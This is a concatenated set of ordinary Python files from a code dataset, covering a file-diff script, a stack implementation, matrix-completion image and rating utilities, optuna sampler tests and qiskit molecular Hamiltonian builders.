uyaml.write(special_ret_collector.get_yaml())\n","sub_path":"analyzer/codechecker_analyzer/analyzers/clangsa/statistics_collector.py","file_name":"statistics_collector.py","file_ext":"py","file_size_in_byte":11803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"430229937","text":"#!/usr/bin/python3.4\n# -*- coding=utf-8 -*-\n#本脚由亁颐堂现任明教教主编写,用于乾颐盾Python课程!\n#教主QQ:605658506\n#亁颐堂官网www.qytang.com\n#乾颐盾是由亁颐堂现任明教教主开发的综合性安全课程\n#包括传统网络安全(防火墙,IPS...)与Python语言和黑客渗透课程!\n\nfrom difflib import *\n\ndef diff_txt(file1,file2):\n\ttxt1 = open(file1, 'r').readlines()\n\ttxt2 = open(file2, 'r').readlines()\n\n\tresult = Differ().compare(txt1, txt2)\n\treturn_result = '\\n'.join(list(result))\n\treturn return_result\n\n\nif __name__ == '__main__':\n\tprint(diff_txt('IOU1.txt','IOU2.txt'))","sub_path":"Practice_Lab/diff_txt.py","file_name":"diff_txt.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"326563009","text":"'''\nOriginal by Ashish Ohri\nModified by Tarun M\nStacks\nThe following operations are performed by the stack in this module\nFunction name Description Return type\nPush(Key) adds key to the collection of stack None\nKeyTop() returns most recently added key String\nKeyPop() removes and returns most recently added key String\nIsEmpty() tells whether the stack is empty Boolean\nDisp() displays the stack List\n'''\n\nclass Stack:\n top=None\n def __init__(self,value):\n self.data=value\n self.next=None\n\ndef Push(Key):\n node=Stack(Key)\n if IsEmpty():\n Stack.top=node\n else:\n node.next=Stack.top\n Stack.top=node\n\ndef KeyTop():\n if IsEmpty():\n return \"Underflow\"\n \n return Stack.top.data\n\ndef KeyPop():\n if IsEmpty():\n return \"Underflow\"\n \n _=Stack.top\n Stack.top=Stack.top.next\n return _.data\n\ndef IsEmpty():\n return Stack.top is None\n\ndef Disp():\n if IsEmpty():\n print(None)\n else:\n temp=Stack.top\n while temp is not None:\n print(temp.data)\n temp=temp.next\n\n''' Menu driven stack implementation '''\n\n\nwhile True:\n print('->Menu \\n 1.Push \\n 2.KeyTop \\n 3.KeyPop \\n 4.Empty \\n 5.Disp \\n and 6. 
Quit')\n x=input('Enter your choice...')\n if x=='1':\n Push(int(input('Enter value to be pushed')))\n elif x=='2':\n print(KeyTop())\n elif x=='3':\n print(KeyPop())\n elif x=='4':\n print(IsEmpty())\n elif x=='5':\n Disp()\n elif x=='6':\n break\n else:\n print(\"Incorrect choice...\")\n","sub_path":"PyStack.py","file_name":"PyStack.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"624052022","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport re\n\n\ndef SVD(X):\n # Return, U, Sigma, V such that X = U.Sigma.V^T\n U, Sigma, V = np.linalg.svd(X, full_matrices=False)\n # Careful, np.linalg.svd return U, sigma, transpose(V) --> V need to be transposed.\n return U, np.diag(Sigma), np.transpose(V)\n\n\ndef inverse_SVD(U, Sigma, V):\n # Returns U.Sigma.V^T\n # inverse_SVD(SVD(X)) should be equal to X\n temp = np.dot(Sigma, np.transpose(V))\n return np.dot(U, temp)\n\n\ndef get_all_conditions(individual):\n # Returns the list of all pgm files representing the individual if it exists (else, it should crash...)\n folder_path = \"data/YaleB-Dataset/images\"\n if individual < 4:\n \tindividual_path = folder_path + \"/yaleB0\" + str(individual)\n else:\n \tindividual_path = folder_path + \"/outliers\"\n\n files = os.listdir( individual_path )\n files = [f for f in files if '.pgm' in f]\n return files\n\n\ndef read_pgm(filename, byteorder='>'):\n # Return image data from a raw PGM file as numpy array.\n # Format specification: http://netpbm.sourceforge.net/doc/pgm.html\n # Credits : 'cgohlke' on https://stackoverflow.com/questions/7368739/numpy-and-16-bit-pgm\n with open(filename, 'rb') as f:\n buffer = f.read()\n try:\n header, width, height, maxval = re.search(\n b\"(^P.\\s(?:\\s*#.*[\\r\\n])*\"\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n]\\s)*)\", buffer).groups()\n except AttributeError:\n raise ValueError(\"Not a raw PGM file: '%s'\" % filename)\n return np.frombuffer(buffer,\n dtype='u1' if int(maxval) < 256 else byteorder+'u2',\n count=int(width)*int(height),\n offset=len(header)\n ).reshape((int(height), int(width)))\n\n\ndef load_image(individual, condition):\n # Load the image number 'condition' for the individual and returns it.\n folder_path = \"data/YaleB-Dataset/images\"\n if individual <4:\n \tindividual_path = folder_path + \"/yaleB0\" + str(individual)\n else:\n \tindividual_path = folder_path + \"/outliers\"\n files = get_all_conditions(individual)\n\n # assume condition < len(files)\n # NOTE: the end of this function and the next helper's name/signature were lost during\n # text extraction; the return below and soft_threshold(X, tau) are hedged reconstructions\n # inferred from the surviving lines (read_pgm is otherwise unused, and the body matches\n # the standard soft-thresholding shrink operator).\n return read_pgm(individual_path + \"/\" + files[condition])\n\n\ndef soft_threshold(X, tau):\n X[X >= tau] -= tau\n X[X <= -tau] += tau\n return X\n\n\ndef flatten_picture(pict):\n return pict.ravel(), pict.shape[0], pict.shape[1]\n\n\ndef unflatten_picture(flat_pict, width, height):\n # unflatten_picture(flatten_picture(pict)) = pict\n return flat_pict.reshape(width, height)\n\n\ndef get_all_flat_pictures(individual):\n # Returns a matrix which lines are the flatten pictures of all individual\n files = get_all_conditions(individual)\n n = len(files)\n all_images = []\n for i in range(n):\n image = load_image(individual, i)\n image, width, height = flatten_picture(image)\n all_images.append(image)\n\n all_images = np.array(all_images)\n return all_images, width, height\n\n\ndef remove_values(X, p=0.2):\n # removes entries of X with probability p\n Omega = np.random.rand(X.shape[0], X.shape[1])\n # NOTE: the two masking lines were garbled in extraction; reconstructed here.\n Omega[Omega < p] = 0\n Omega[Omega >= p] = 1\n return X * Omega\n\n\ndef compute_L2_error(X, X_star):\n return np.sum((X - X_star)**2)\n\n\ndef 
compute_columnwise_L2(X, X_star):\n return np.sum((X - X_star)**2, axis = 1)\n\n\ndef plot_reconstruction(all_images, noisy_images, completed_images, condition, width, height, message=None):\n image = all_images[condition,:]\n image = unflatten_picture(image, width, height)\n noisy_image = noisy_images[condition, :]\n noisy_image = unflatten_picture(noisy_image, width, height)\n completed_image = completed_images[condition, :]\n completed_image = unflatten_picture(completed_image, width, height)\n\n plt.subplot(1,3,1)\n plt.imshow(image, plt.cm.gray)\n plt.title(\"Original Image\")\n\n plt.subplot(1,3,2)\n plt.imshow(noisy_image, plt.cm.gray)\n plt.title(\"Partially Destroyed Image\")\n\n plt.subplot(1,3,3)\n completed_image = np.maximum(0, np.minimum(completed_image, 255))\n plt.imshow(completed_image, plt.cm.gray)\n if message is None:\n plt.title(\"Reconstructed Image\")\n else:\n plt.title(message)\n plt.show()\n\n\ndef load_movie_ratings():\n with open('data/romance_horror.txt', 'r') as f:\n lines = f.read()\n\n # Let's build the rating matrix !\n users_cpt = 0; genre_1_cpt = 0; genre_2_cpt = 0; movies_cpt = 0\n # Create dictionaries to create new ids\n users = {}\n genre_1 = {}\n genre_2 = {}\n movies = {}\n\n lines = lines.split('\\n')\n for l in lines[1:]:\n l = l.split(',')\n user = l[0]\n genre = l[1]\n movie = l[2]\n if user not in users.keys():\n users[user] = users_cpt\n users_cpt += 1\n if genre == '1':\n if movie not in genre_1.keys():\n genre_1[movie] = genre_1_cpt\n movies[movie] = movies_cpt\n genre_1_cpt += 1\n movies_cpt += 1\n if genre == '2':\n if movie not in genre_2.keys():\n genre_2[movie] = genre_2_cpt\n genre_2_cpt += 1\n movies[movie] = movies_cpt\n movies_cpt += 1\n\n matrix_genre1 = np.zeros((users_cpt, genre_1_cpt))\n matrix_genre2 = np.zeros((users_cpt, genre_2_cpt))\n matrix_all_movies = np.zeros((users_cpt, movies_cpt))\n\n # Now, let's get the data to the matrices !\n\n for l in lines[1:]:\n l = l.split(',')\n user_id = users[l[0]]\n genre = l[1]\n rating = l[3]\n if genre == '1':\n genre1_id = genre_1[l[2]]\n movie_id = movies[l[2]]\n matrix_genre1[user_id, genre1_id] = float(rating)\n matrix_all_movies[user_id, movie_id] = float(rating)\n if genre == '2':\n genre2_id = genre_2[l[2]]\n movie_id = movies[l[2]]\n matrix_genre2[user_id, genre2_id] = float(rating)\n matrix_all_movies[user_id, movie_id] = float(rating)\n\n return matrix_genre1, matrix_genre2, matrix_all_movies\n\n\ndef split_train_test_netflix(data, p_train=0.8):\n W = np.sign(data)\n p_test = 1-p_train\n Omega = np.random.rand(data.shape[0], data.shape[1])\n # NOTE: the two masking lines were garbled in extraction; reconstructed here to keep a\n # p_train fraction of the observed entries, matching the surviving \"= 1\" assignment.\n Omega[Omega < p_test] = 0\n Omega[Omega >= p_test] = 1\n\n train = data * W * Omega # No need for W multiplication but it was added for clarity\n test = data * W * (1 - Omega)\n\n where_train = W * Omega\n where_test = W * (1-Omega)\n return train, test, where_train, where_test\n # where_train is equal to 1 where train values are non zero, where_test = 1 where test is equal to 1.\n\n\n\n\n\nif __name__==\"__main__\":\n \"\"\" Use this main function only to debug \"\"\"\n\n horror, romance, matrix_all_movies = load_movie_ratings()\n train, test, where_train, where_test = split_train_test_netflix(matrix_all_movies)\n\n ### Testing SVD\n X = np.array([[15,1,1], [1,20,1], [1,1,25]])\n print(\"X = \")\n print(X)\n U, Sigma, V = SVD(X)\n print(\"Sigma_X = \")\n print(Sigma)\n print(\"inverse_SVD(SVD(X)) = \")\n print(inverse_SVD(U, Sigma, V))\n\n # Testing loading\n image = load_image(2, 1)\n plt.imshow(image, plt.cm.gray)\n plt.show()\n\n # Testing Flatten and unflatten\n 
flat, width, height = flatten_picture(image)\n pict = unflatten_picture(flat, width, height)\n plt.imshow(pict, plt.cm.gray)\n plt.show()\n\n # Testing get_all_flat_pictures\n all_images, width, height = get_all_flat_pictures(1)\n noisy_images = remove_values(all_images, p=0.4)\n pict = noisy_images[0, :]\n pict = unflatten_picture(pict, width, height)\n plt.imshow(pict, plt.cm.gray)\n plt.show()\n","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":7932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"137729252","text":"from typing import Callable\nfrom unittest.mock import patch\n\nimport pytest\n\nimport optuna\nfrom optuna.integration import PyCmaSampler\nfrom optuna.integration import SkoptSampler\nfrom optuna.samplers import BaseSampler\nfrom optuna.testing.sampler import FirstTrialOnlyRandomSampler\n\n\nparametrize_sampler = pytest.mark.parametrize(\n \"sampler_class\", [optuna.integration.SkoptSampler, optuna.integration.PyCmaSampler]\n)\n\n\n@pytest.mark.parametrize(\n \"sampler_class\",\n [\n lambda: SkoptSampler(independent_sampler=FirstTrialOnlyRandomSampler()),\n lambda: PyCmaSampler(independent_sampler=FirstTrialOnlyRandomSampler()),\n ],\n)\ndef test_suggested_value(sampler_class: Callable[[], BaseSampler]) -> None:\n\n sampler = sampler_class()\n # direction='minimize'\n study = optuna.create_study(sampler=sampler, direction=\"minimize\")\n study.optimize(_objective, n_trials=10, catch=())\n for trial in study.trials:\n for param_name, param_value in trial.params.items():\n distribution = trial.distributions[param_name]\n param_value_in_internal_repr = distribution.to_internal_repr(param_value)\n assert distribution._contains(param_value_in_internal_repr)\n\n # direction='maximize'\n study = optuna.create_study(sampler=sampler, direction=\"maximize\")\n study.optimize(_objective, n_trials=10, catch=())\n for trial in study.trials:\n for param_name, param_value in trial.params.items():\n distribution = trial.distributions[param_name]\n param_value_in_internal_repr = distribution.to_internal_repr(param_value)\n assert distribution._contains(param_value_in_internal_repr)\n\n\n@parametrize_sampler\ndef test_sample_independent(sampler_class: Callable[[], BaseSampler]) -> None:\n\n sampler = sampler_class()\n study = optuna.create_study(sampler=sampler)\n\n # First trial.\n def objective0(trial: optuna.trial.Trial) -> float:\n\n p0 = trial.suggest_float(\"p0\", 0, 10)\n p1 = trial.suggest_float(\"p1\", 1, 10, log=True)\n p2 = trial.suggest_int(\"p2\", 0, 10)\n p3 = trial.suggest_float(\"p3\", 0, 9, step=3)\n p4 = trial.suggest_categorical(\"p4\", [\"10\", \"20\", \"30\"])\n assert isinstance(p4, str)\n return p0 + p1 + p2 + p3 + int(p4)\n\n with patch.object(sampler, \"sample_independent\") as mock_object:\n mock_object.side_effect = [1, 2, 3, 3, \"10\"]\n\n study.optimize(objective0, n_trials=1)\n\n # In first trial, all parameters were suggested via `sample_independent`.\n assert mock_object.call_count == 5\n\n # Second trial.\n def objective1(trial: optuna.trial.Trial) -> float:\n\n # p0, p2 and p4 are deleted.\n p1 = trial.suggest_float(\"p1\", 1, 10, log=True)\n p3 = trial.suggest_float(\"p3\", 0, 9, step=3)\n\n # p5 is added.\n p5 = trial.suggest_float(\"p5\", 0, 1)\n\n return p1 + p3 + p5\n\n with patch.object(sampler, \"sample_independent\") as mock_object:\n mock_object.side_effect = [0]\n\n study.optimize(objective1, n_trials=1)\n\n assert [call[1][2] for call in 
mock_object.mock_calls] == [\"p5\"]\n\n # Third trial.\n def objective2(trial: optuna.trial.Trial) -> float:\n\n p1 = trial.suggest_float(\"p1\", 50, 100, log=True) # The range has been changed\n p3 = trial.suggest_float(\"p3\", 0, 9, step=3)\n p5 = trial.suggest_float(\"p5\", 0, 1)\n\n return p1 + p3 + p5\n\n with patch.object(sampler, \"sample_independent\") as mock_object:\n mock_object.side_effect = [90, 0.2]\n\n study.optimize(objective2, n_trials=1)\n\n assert [call[1][2] for call in mock_object.mock_calls] == [\"p1\", \"p5\"]\n\n\n@pytest.mark.parametrize(\n \"sampler_class\",\n [\n lambda x: SkoptSampler(warn_independent_sampling=x),\n lambda x: PyCmaSampler(warn_independent_sampling=x),\n ],\n)\ndef test_warn_independent_sampling(sampler_class: Callable[[bool], BaseSampler]) -> None:\n\n # warn_independent_sampling=True\n sampler = sampler_class(True)\n study = optuna.create_study(sampler=sampler)\n\n class_name = \"optuna.integration.{}\".format(sampler.__class__.__name__)\n method_name = \"{}._log_independent_sampling\".format(class_name)\n\n with patch(method_name) as mock_object:\n study.optimize(\n lambda t: t.suggest_float(\"p0\", 0, 10) + t.suggest_float(\"q0\", 0, 10), n_trials=1\n )\n assert mock_object.call_count == 0\n\n with patch(method_name) as mock_object:\n study.optimize(\n lambda t: t.suggest_float(\"p1\", 0, 10) + t.suggest_float(\"q1\", 0, 10), n_trials=1\n )\n assert mock_object.call_count == 2\n\n # warn_independent_sampling=False\n sampler = sampler_class(False)\n study = optuna.create_study(sampler=sampler)\n\n with patch(method_name) as mock_object:\n study.optimize(\n lambda t: t.suggest_float(\"p0\", 0, 10) + t.suggest_float(\"q0\", 0, 10), n_trials=1\n )\n assert mock_object.call_count == 0\n\n with patch(method_name) as mock_object:\n study.optimize(\n lambda t: t.suggest_float(\"p1\", 0, 10) + t.suggest_float(\"q1\", 0, 10), n_trials=1\n )\n assert mock_object.call_count == 0\n\n\ndef _objective(trial: optuna.trial.Trial) -> float:\n\n p0 = trial.suggest_float(\"p0\", -3.3, 5.2)\n p1 = trial.suggest_float(\"p1\", 2.0, 2.0)\n p2 = trial.suggest_float(\"p2\", 0.0001, 0.3, log=True)\n p3 = trial.suggest_float(\"p3\", 1.1, 1.1, log=True)\n p4 = trial.suggest_int(\"p4\", -100, 8)\n p5 = trial.suggest_int(\"p5\", -20, -20)\n p6 = trial.suggest_float(\"p6\", 10, 20, step=2)\n p7 = trial.suggest_float(\"p7\", 0.1, 1.0, step=0.1)\n p8 = trial.suggest_float(\"p8\", 2.2, 2.2, step=0.5)\n p9 = trial.suggest_categorical(\"p9\", [\"9\", \"3\", \"0\", \"8\"])\n assert isinstance(p9, str)\n\n return p0 + p1 + p2 + p3 + p4 + p5 + p6 + p7 + p8 + int(p9)\n","sub_path":"tests/integration_tests/test_sampler.py","file_name":"test_sampler.py","file_ext":"py","file_size_in_byte":5853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"125738536","text":"import numpy as np\nfrom qiskit.opflow.primitive_ops import PauliOp\nfrom qiskit.opflow.list_ops import SummedOp\nfrom qiskit.quantum_info import Pauli\nfrom qiskit.opflow.primitive_ops.pauli_sum_op import PauliSumOp\nfrom qiskit.opflow.primitive_ops.tapered_pauli_sum_op import TaperedPauliSumOp\nfrom qiskit_nature.circuit.library import HartreeFock\nfrom qiskit_nature.transformers.second_quantization.electronic import FreezeCoreTransformer\nfrom qiskit_nature.problems.second_quantization.electronic import ElectronicStructureProblem\nfrom qiskit_nature.mappers.second_quantization import ParityMapper, JordanWignerMapper, BravyiKitaevMapper\nfrom 
qiskit_nature.converters.second_quantization.qubit_converter import QubitConverter\nfrom qiskit.opflow.primitive_ops import Z2Symmetries\nfrom qiskit_nature.drivers.second_quantization.pyquanted import PyQuanteDriver\nfrom IPython import get_ipython\n\ndef HeisenbergHamiltonian(J=1, H=1, num_qubits=2, neighbours=[(0, 1)]):\n\t\"\"\"\n\tQiskit operator of the 3-D Heisemberg Hamiltonian of a lattice of spins.\n\n\tH = - J Σ_j ( X_j X_{j+1} + Y_j Y_{j+1} + Z_j Z_{j+1} ) - H Σ_j Z_j\n\n\tParameters\n\t----------\n\tJ: float\n\t\tCoupling constant.\n\tH: float\n\t\tExternal magnetic field.\n\tnum_qubits: int.\n\t\tNumber of qubits.\n\tneighbours: list(tuples).\n\t\tCoupling between the spins.\n\n\tReturn\n\t------\n\tHamiltonian: SummedOp\n\t\tHeisenberg Hamiltonian of the system.\n\t\"\"\"\n\tnum_op = num_qubits + 3 * len(neighbours)\n\tHamiltonian_op_x = []\n\tHamiltonian_op_z = []\n\tHamiltonian_coef = num_qubits * [-H] + num_op * [-J]\n\n\tfor idx in range(num_qubits):\n\t\top_x = np.zeros(num_qubits)\n\t\top_z = np.zeros(num_qubits)\n\t\top_z[idx] = 1\n\t\tHamiltonian_op_x.append(op_x.copy())\n\t\tHamiltonian_op_z.append(op_z.copy())\n\n\tfor idx in neighbours:\n\t\top_x = np.zeros(num_qubits)\n\t\top_z = np.zeros(num_qubits)\n\t\top_x[idx[0]] = 1\n\t\top_x[idx[1]] = 1\n\t\tHamiltonian_op_x.append(op_x.copy())\n\t\tHamiltonian_op_z.append(op_z.copy())\n\t\top_z[idx[0]] = 1\n\t\top_z[idx[1]] = 1\n\t\tHamiltonian_op_x.append(op_x.copy())\n\t\tHamiltonian_op_z.append(op_z.copy())\n\t\top_x[idx[0]] = 0\n\t\top_x[idx[1]] = 0\n\t\tHamiltonian_op_x.append(op_x.copy())\n\t\tHamiltonian_op_z.append(op_z.copy())\n\n\tHamiltonian = SummedOp(\n\t\t[PauliOp(Pauli((Hamiltonian_op_z[j], Hamiltonian_op_x[j])), Hamiltonian_coef[j]) for j in range(num_op)])\n\n\treturn Hamiltonian\n\n\ndef RandomHamiltonian(num_qubits=2, num_paulis=4):\n\tidxs = np.random.randint(2, size=(2, num_qubits, num_paulis))\n\n\tHamiltonian = SummedOp([PauliOp(Pauli((idxs[0, :, j], idxs[1, :, j])), 1) for j in range(num_paulis)])\n\n\treturn Hamiltonian\n\n\ndef Label2Chain(QubitOp):\n\t\"\"\"\n\tTransform a string of Pauli matrices into a numpy array.\n\t'I' --> 0\n\t'X' --> 1\n\t'Y' --> 2\n\t'Z' --> 3\n\n\tParameters\n\t----------\n\tQubitOp: SummedOp.\n\n\tReturns\n\t-------\n\tops: ndarray(Pauli operators) (number_of_operators, number_of_qubits)\n\tcoef: list(float)\n\t\tCoefficients of each Pauli operator.\n\tlabel: list(str)\n\t\tPauli strings\n\t\"\"\"\n\tDict = {'I': 0,\n\t 'X': 1,\n\t 'Y': 2,\n\t 'Z': 3}\n\n\tif type(QubitOp) == PauliSumOp or type(QubitOp) == TaperedPauliSumOp:\n\t\tQubitOp = QubitOp.to_pauli_op()\n\n\tlabel = []\n\tops = []\n\tcoef = []\n\n\tfor idx in QubitOp.oplist:\n\t\tlabel_temp = idx.primitive.to_label()\n\t\tlabel.append(label_temp)\n\t\tops.append([Dict.get(idx) for idx in label_temp])\n\t\tcoef.append(idx.coeff)\n\n\treturn np.array(ops), coef, label\n\n\ndef from_string_to_numbers(pauli_labels):\n\t\"\"\"\n\tFunction that transform a set of pauli string from the str convention ('IXYZ'), to the number convention (0123).\n\n\tParameter\n\t---------\n\tpauli_labels: list\n\t\tList with the pauli string written as a string.\n\n\tReturn\n\t------\n\tPS: array\n\t\tPauli strings in the number convention.\n\t\"\"\"\n\tmap_str_int = {'I': 0, 'X': 1, 'Y': 2, 'Z': 3} # Map between str and int conventions\n\tPS = [] # Initialize the Pauli string for int convention\n\n\tfor label in pauli_labels: # Iterate over all the given pauli strings\n\t\ttemp = []\n\t\tfor letter in label: # Map each element of a 
Pauli string\n\t\t\ttemp.append(map_str_int[letter])\n\n\t\tPS.append(np.array(temp))\n\treturn np.array(PS)\n\n\ndef get_backend_conectivity(backend):\n\t\"\"\"\n\tGet the connected qubit of q backend. Has to be a quantum computer.\n\n\tParameters\n\t----------\n\tbackend: qiskit.backend\n\n\tReturn\n\t------\n\tconnexions: (list)\n\t\tList with the connected qubits\n\t\"\"\"\n\tdefaults = backend.defaults()\n\tconnexions = [indx for indx in defaults.instruction_schedule_map.qubits_with_instruction('cx')]\n\treturn connexions\n\n\ndef H2(distance=.761, freeze_core=True, remove_orbitals=False, initial_state=False, operator=True, mapper_type='ParityMapper'):\n\t\"\"\"\n\tQiskit operator of the LiH\n\n\tParameters\n\t----------\n\tdistance: float (optional)\n\t\tDistance between atoms of Li and H\n\tfreeze_core: Bool (optional)\n\t\tIf freeze some cores that do highly impact in the energy\n\tremove_orbitals: Bool (optional)\n\t\tRemove some orbitals that do no impact in the energy\n\tinitial_state: Bool (optional)\n\t\tReturn the initial Hartree Fock state\n\tmapper_type: str (optional)\n\t\tType of mapping between orbitals and qubits. Available options:\n\t\t\t'ParityMapper'\n\t\t\t'JordanWignerMapper'\n\t\t\t'BravyiKitaevMapper'\n\n\tReturns\n\t-------\n\tqubit_op: SummedOp\n\t\tPauli strings and coefficients for the Hamiltonian\n\tinit_state: QuantumCircuit (if initial_state=True)\n\t\tQuantum Circuit with the initial state given by Hartree Fock\n\t\"\"\"\n\n\tmolecule = 'H .0 .0 .0; H .0 .0 ' + str(distance)\n\n\ttry:\n\t\tdriver = PySCFDriver(molecule)\n\texcept:\n\t\tfrom qiskit_nature.drivers.second_quantization.pyquanted import PyQuanteDriver\n\t\tdriver = PyQuanteDriver(molecule)\n\n\tqmolecule = driver.run()\n\n\tif remove_orbitals is False:\n\t\tTransfomer = FreezeCoreTransformer(freeze_core=freeze_core) \n\telse: \n\t\tTransfomer = FreezeCoreTransformer(freeze_core=freeze_core, remove_orbitals=remove_orbitals)\n\n\tproblem = ElectronicStructureProblem(driver, transformers=[Transfomer])\n\n\t# Generate the second-quantized operators\n\tsecond_q_ops = problem.second_q_ops()\n\n\t# Hamiltonian\n\tmain_op = second_q_ops[0]\n\n\t# Setup the mapper and qubit converter\n\tif mapper_type == 'ParityMapper':\n\t\tmapper = ParityMapper()\n\telif mapper_type == 'JordanWignerMapper':\n\t\tmapper = JordanWignerMapper()\n\telif mapper_type == 'BravyiKitaevMapper':\n\t\tmapper = BravyiKitaevMapper()\n\n\t# The fermionic operators are mapped\n\tconverter = QubitConverter(mapper=mapper, two_qubit_reduction=True)\n\n\tif operator is False :\n\t\treturn converter, problem\n\telse :\n\t\tparticle_number = problem.grouped_property_transformed.get_property(\"ParticleNumber\")\n\t\tnum_particles = ( particle_number.num_alpha, particle_number.num_beta )\n\t\tnum_spin_orbitals = particle_number.num_spin_orbitals\n\t\tqubit_op = converter.convert(main_op, num_particles=num_particles) \n\t\tif initial_state is False:\n\t\t\treturn qubit_op \n\t\telse:\n\t\t\tinit_state = HartreeFock(num_spin_orbitals, num_particles, converter)\n\t\t\treturn qubit_op, init_state\n\n\n\ndef LiH(distance=1.5474, freeze_core=True, remove_orbitals=[3,4], initial_state=False, operator=True, mapper_type='ParityMapper'):\n\t\"\"\"\n\tQiskit operator of the LiH\n\n\tParameters\n\t----------\n\tdistance: float (optional)\n\t\tDistance between atoms of Li and H\n\tfreeze_core: Bool (optional)\n\t\tIf freeze some cores that do highly impact in the energy\n\tremove_orbitals: Bool (optional)\n\t\tRemove some orbitals that do no impact in 
the energy\n\tinitial_state: Bool (optional)\n\t\tReturn the initial Hartree Fock state\n\tmapper_type: str (optional)\n\t\tType of mapping between orbitals and qubits. Available options:\n\t\t\t'ParityMapper'\n\t\t\t'JordanWignerMapper'\n\t\t\t'BravyiKitaevMapper'\n\n\tReturns\n\t-------\n\tqubit_op: SummedOp\n\t\tPauli strings and coefficients for the Hamiltonian\n\tinit_state: QuantumCircuit (if initial_state=True)\n\t\tQuantum Circuit with the initial state given by Hartree Fock\n\t\"\"\"\n\n\tmolecule = 'Li 0.0 0.0 0.0; H 0.0 0.0 ' + str(distance)\n\n\ttry:\n\t\tdriver = PySCFDriver(molecule)\n\texcept:\n\t\tfrom qiskit_nature.drivers.second_quantization.pyquanted import PyQuanteDriver\n\t\tdriver = PyQuanteDriver(molecule)\n\n\tqmolecule = driver.run()\n\n\tif remove_orbitals is False:\n\t\tTransfomer = FreezeCoreTransformer(freeze_core=freeze_core) \n\telse: \n\t\tTransfomer = FreezeCoreTransformer(freeze_core=freeze_core, remove_orbitals=remove_orbitals)\n\n\tproblem = ElectronicStructureProblem(driver, transformers=[Transfomer])\n\n\t# Generate the second-quantized operators\n\tsecond_q_ops = problem.second_q_ops()\n\n\t# Hamiltonian\n\tmain_op = second_q_ops[0]\n\n\t# Setup the mapper and qubit converter\n\tif mapper_type == 'ParityMapper':\n\t\tmapper = ParityMapper()\n\telif mapper_type == 'JordanWignerMapper':\n\t\tmapper = JordanWignerMapper()\n\telif mapper_type == 'BravyiKitaevMapper':\n\t\tmapper = BravyiKitaevMapper()\n\n\t# The fermionic operators are mapped\n\tconverter = QubitConverter(mapper=mapper, two_qubit_reduction=True)\n\n\t# The fermionic operators are mapped to qubit operators\n\tnum_particles = (problem.grouped_property_transformed.get_property(\"ParticleNumber\").num_alpha,\n problem.grouped_property_transformed.get_property(\"ParticleNumber\").num_beta)\n# \tnum_spin_orbitals = 2 * problem.molecule_data_transformed.num_molecular_orbitals\n\n\tif operator is False :\n\t\treturn converter, problem\n\telse :\n\t\tparticle_number = problem.grouped_property_transformed.get_property(\"ParticleNumber\")\n\t\tnum_particles = ( particle_number.num_alpha, particle_number.num_beta )\n\t\tnum_spin_orbitals = particle_number.num_spin_orbitals\n\t\tqubit_op = converter.convert(main_op, num_particles=num_particles) \n\t\tif initial_state is False:\n\t\t\treturn qubit_op \n\t\telse:\n\t\t\tinit_state = HartreeFock(num_spin_orbitals, num_particles, converter)\n\t\t\treturn qubit_op, init_state\n\n\n\ndef BeH2(distance=1.339, freeze_core=True, remove_orbitals=[3,6], operator=True, initial_state=False, mapper_type='ParityMapper'): #\n\t\"\"\"\n\tQiskit operator of the BeH2\n\n\tParameters\n\t----------\n\tdistance: float (optional)\n\t\tDistance between atoms of Be and H\n\tfreeze_core: Bool (optional)\n\t\tIf freeze some cores that do highly impact in the energy\n\tremove_orbitals: Bool (optional)\n\t\tRemove some orbitals that do no impact in the energy\n\tinitial_state: Bool (optional)\n\t\tReturn the initial Hartree Fock state\n\tmapper_type: str (optional)\n\t\tType of mapping between orbitals and qubits. 
Available options:\n\t\t\t'ParityMapper'\n\t\t\t'JordanWignerMapper'\n\t\t\t'BravyiKitaevMapper'\n\n\tReturns\n\t-------\n\tqubit_op: SummedOp\n\t\tPauli strings and coefficients for the Hamiltonian\n\tinit_state: QuantumCircuit (if initial_state=True)\n\t\tQuantum Circuit with the initial state given by Hartree Fock\n\t\"\"\"\n\n\tmolecule = 'H 0.0 0.0 -' + str(distance) + '; Be 0.0 0.0 0.0; H 0.0 0.0 ' + str(distance)\n\n\ttry:\n\t\tdriver = PySCFDriver(molecule)\n\texcept:\n\t\tfrom qiskit_nature.drivers.second_quantization.pyquanted import PyQuanteDriver\n\t\tdriver = PyQuanteDriver(molecule)\n\n\tqmolecule = driver.run()\n\tif remove_orbitals is False:\n\t\tTransfomer = FreezeCoreTransformer(freeze_core=freeze_core) \n\telse: \n\t\tTransfomer = FreezeCoreTransformer(freeze_core=freeze_core, remove_orbitals=remove_orbitals)\n\n\tproblem = ElectronicStructureProblem(driver,transformers=[Transfomer])\n\n\t# Generate the second-quantized operators\n\tsecond_q_ops = problem.second_q_ops()\n\n\t# Hamiltonian\n\tmain_op = second_q_ops[0]\n\n\t# Setup the mapper and qubit converter\n\tif mapper_type == 'ParityMapper':\n\t\tmapper = ParityMapper()\n\telif mapper_type == 'JordanWignerMapper':\n\t\tmapper = JordanWignerMapper()\n\telif mapper_type == 'BravyiKitaevMapper':\n\t\tmapper = BravyiKitaevMapper()\n \n\tnum_particles = (problem.grouped_property_transformed.get_property(\"ParticleNumber\").num_alpha,\n problem.grouped_property_transformed.get_property(\"ParticleNumber\").num_beta)\n\t# The fermionic operators are mapped\n\tconverter = QubitConverter(mapper=mapper, two_qubit_reduction=True, z2symmetry_reduction=\"auto\")\n \n\tif operator is False :\n\t\treturn converter, problem\n\telse :\n\t\tparticle_number = problem.grouped_property_transformed.get_property(\"ParticleNumber\")\n\t\tnum_particles = ( particle_number.num_alpha, particle_number.num_beta )\n\t\tnum_spin_orbitals = particle_number.num_spin_orbitals\n\t\tqubit_op = converter.convert(main_op, num_particles=num_particles) \n\t\tif initial_state is False:\n\t\t\treturn qubit_op 